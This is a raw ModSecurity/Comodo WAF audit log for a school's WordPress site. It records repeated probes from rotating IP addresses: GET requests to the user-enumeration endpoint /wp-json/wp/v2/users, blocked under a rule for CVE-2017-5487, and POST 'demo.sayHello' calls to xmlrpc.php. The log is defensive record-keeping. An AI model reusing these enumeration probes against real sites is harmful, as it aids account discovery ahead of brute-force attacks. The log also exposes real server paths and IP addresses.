"TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746459989882375 5375 (- - -) Stopwatch2: 1746459989882375 5375; combined=4196, p1=496, p2=3465, p3=32, p4=36, p5=101, sr=72, sw=66, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6371a968-Z-- --fc38fe03-A-- [05/May/2025:22:46:46 +0700] aBjdZvZJDMuQndL03JNZrgAAAEQ 103.236.140.4 36102 103.236.140.4 8181 --fc38fe03-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.92.160 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.92.160 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --fc38fe03-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fc38fe03-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746460006697950 15850 (- - -) Stopwatch2: 1746460006697950 15850; combined=27239, p1=469, p2=806, p3=0, p4=0, p5=12996, sr=132, sw=0, l=0, gc=12968 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fc38fe03-Z-- --7e84c03c-A-- [05/May/2025:22:46:48 +0700] aBjdaPZJDMuQndL03JNZsgAAAEs 103.236.140.4 36120 103.236.140.4 8181 --7e84c03c-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.109.97 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.109.97 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --7e84c03c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7e84c03c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746460008323021 2901 (- - -) Stopwatch2: 1746460008323021 2901; combined=1275, p1=420, p2=821, p3=0, p4=0, p5=34, sr=89, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7e84c03c-Z-- --db301049-A-- [05/May/2025:22:46:48 +0700] aBjdaIZWvR7-42f6JrAKtAAAAMU 103.236.140.4 36128 103.236.140.4 8181 --db301049-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.174.49 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.174.49 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --db301049-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --db301049-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746460008747556 2994 (- - -) Stopwatch2: 1746460008747556 2994; combined=1360, p1=407, p2=921, p3=0, p4=0, p5=32, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --db301049-Z-- --8c8f7774-A-- [05/May/2025:22:46:50 +0700] aBjdavZJDMuQndL03JNZuQAAAEE 103.236.140.4 36148 103.236.140.4 8181 --8c8f7774-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.92.160 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.92.160 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --8c8f7774-C-- demo.sayHello --8c8f7774-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --8c8f7774-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746460010084187 4951 (- - -) Stopwatch2: 1746460010084187 4951; combined=3886, p1=471, p2=3209, p3=24, p4=28, p5=90, sr=73, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8c8f7774-Z-- --1e89e75e-A-- [05/May/2025:22:46:51 +0700] aBjda_ZJDMuQndL03JNZvQAAAEQ 103.236.140.4 36160 103.236.140.4 8181 --1e89e75e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.109.97 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.109.97 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --1e89e75e-C-- demo.sayHello --1e89e75e-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --1e89e75e-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746460011289350 5423 (- - -) Stopwatch2: 1746460011289350 5423; combined=3891, p1=481, p2=3205, p3=26, p4=30, p5=87, sr=70, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1e89e75e-Z-- --2755e669-A-- [05/May/2025:22:46:51 +0700] aBjda_ZJDMuQndL03JNZvwAAAE0 103.236.140.4 36164 103.236.140.4 8181 --2755e669-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.174.49 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.174.49 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --2755e669-C-- demo.sayHello --2755e669-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --2755e669-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746460011547523 4722 (- - -) Stopwatch2: 1746460011547523 4722; combined=3627, p1=442, p2=2981, p3=21, p4=24, p5=92, sr=66, sw=67, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2755e669-Z-- --ae184c48-A-- [05/May/2025:22:46:56 +0700] aBjdcIZWvR7-42f6JrAKtwAAANE 103.236.140.4 36198 103.236.140.4 8181 --ae184c48-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.248.83.33 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.83.33 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --ae184c48-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ae184c48-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746460016321439 2926 (- - -) Stopwatch2: 1746460016321439 2926; combined=1349, p1=453, p2=865, p3=0, p4=0, p5=31, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ae184c48-Z-- --0aec5c12-A-- [05/May/2025:22:46:59 +0700] aBjdc4ZWvR7-42f6JrAKuwAAAMM 103.236.140.4 36230 103.236.140.4 8181 --0aec5c12-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.248.83.33 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.83.33 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --0aec5c12-C-- demo.sayHello --0aec5c12-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --0aec5c12-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746460019104559 5886 (- - -) Stopwatch2: 1746460019104559 5886; combined=4291, p1=530, p2=3533, p3=30, p4=32, p5=97, sr=73, sw=69, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0aec5c12-Z-- --9aa85a4d-A-- [05/May/2025:22:47:14 +0700] aBjdggRwKNFSM6B7_LaeMwAAAIg 103.236.140.4 36350 103.236.140.4 8181 --9aa85a4d-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.90.46 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.90.46 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --9aa85a4d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9aa85a4d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746460034168109 2977 (- - -) Stopwatch2: 1746460034168109 2977; combined=1281, p1=430, p2=822, p3=0, p4=0, p5=29, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9aa85a4d-Z-- --06096936-A-- [05/May/2025:22:47:17 +0700] aBjdhYZWvR7-42f6JrAKwwAAAMs 103.236.140.4 36378 103.236.140.4 8181 --06096936-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.90.46 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.90.46 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --06096936-C-- demo.sayHello --06096936-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --06096936-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746460037075234 6017 (- - -) Stopwatch2: 1746460037075234 6017; combined=4472, p1=547, p2=3697, p3=33, p4=36, p5=94, sr=73, sw=65, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --06096936-Z-- --3a59491a-A-- [05/May/2025:22:47:29 +0700] aBjdkU2V_h1VFAgsfgZ6SAAAAA8 103.236.140.4 36462 103.236.140.4 8181 --3a59491a-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.95.26 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.95.26 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --3a59491a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3a59491a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746460049189670 2669 (- - -) Stopwatch2: 1746460049189670 2669; combined=1134, p1=368, p2=740, p3=0, p4=0, p5=25, sr=63, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3a59491a-Z-- --d937a92d-A-- [05/May/2025:22:47:32 +0700] aBjdlPZJDMuQndL03JNZ1wAAAEw 103.236.140.4 36490 103.236.140.4 8181 --d937a92d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.95.26 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.95.26 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --d937a92d-C-- demo.sayHello --d937a92d-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --d937a92d-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746460052111256 5780 (- - -) Stopwatch2: 1746460052111256 5780; combined=4342, p1=541, p2=3563, p3=35, p4=36, p5=98, sr=72, sw=69, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d937a92d-Z-- --17577750-A-- [05/May/2025:22:47:32 +0700] aBjdlPZJDMuQndL03JNZ2QAAAE0 103.236.140.4 36496 103.236.140.4 8181 --17577750-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.95.159 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.95.159 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --17577750-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --17577750-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746460052463712 2668 (- - -) Stopwatch2: 1746460052463712 2668; combined=1223, p1=414, p2=780, p3=0, p4=0, p5=29, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --17577750-Z-- --2e579c44-A-- [05/May/2025:22:47:35 +0700] aBjdl02V_h1VFAgsfgZ6UAAAABM 103.236.140.4 36530 103.236.140.4 8181 --2e579c44-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.95.159 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.95.159 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --2e579c44-C-- demo.sayHello --2e579c44-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --2e579c44-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746460055243800 5928 (- - -) Stopwatch2: 1746460055243800 5928; combined=4375, p1=604, p2=3538, p3=40, p4=36, p5=93, sr=75, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2e579c44-Z-- --2fb7a06b-A-- [05/May/2025:22:47:43 +0700] aBjdn_ZJDMuQndL03JNZ3wAAAFU 103.236.140.4 36606 103.236.140.4 8181 --2fb7a06b-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.117.180 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.117.180 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --2fb7a06b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2fb7a06b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746460063497481 2527 (- - -) Stopwatch2: 1746460063497481 2527; combined=1106, p1=370, p2=703, p3=0, p4=0, p5=33, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2fb7a06b-Z-- --4dbbc442-A-- [05/May/2025:22:47:46 +0700] aBjdogRwKNFSM6B7_LaeSgAAAI0 103.236.140.4 36642 103.236.140.4 8181 --4dbbc442-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.117.180 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.117.180 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --4dbbc442-C-- demo.sayHello --4dbbc442-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --4dbbc442-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746460066856531 5429 (- - -) Stopwatch2: 1746460066856531 5429; combined=4052, p1=502, p2=3326, p3=34, p4=33, p5=92, sr=70, sw=65, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
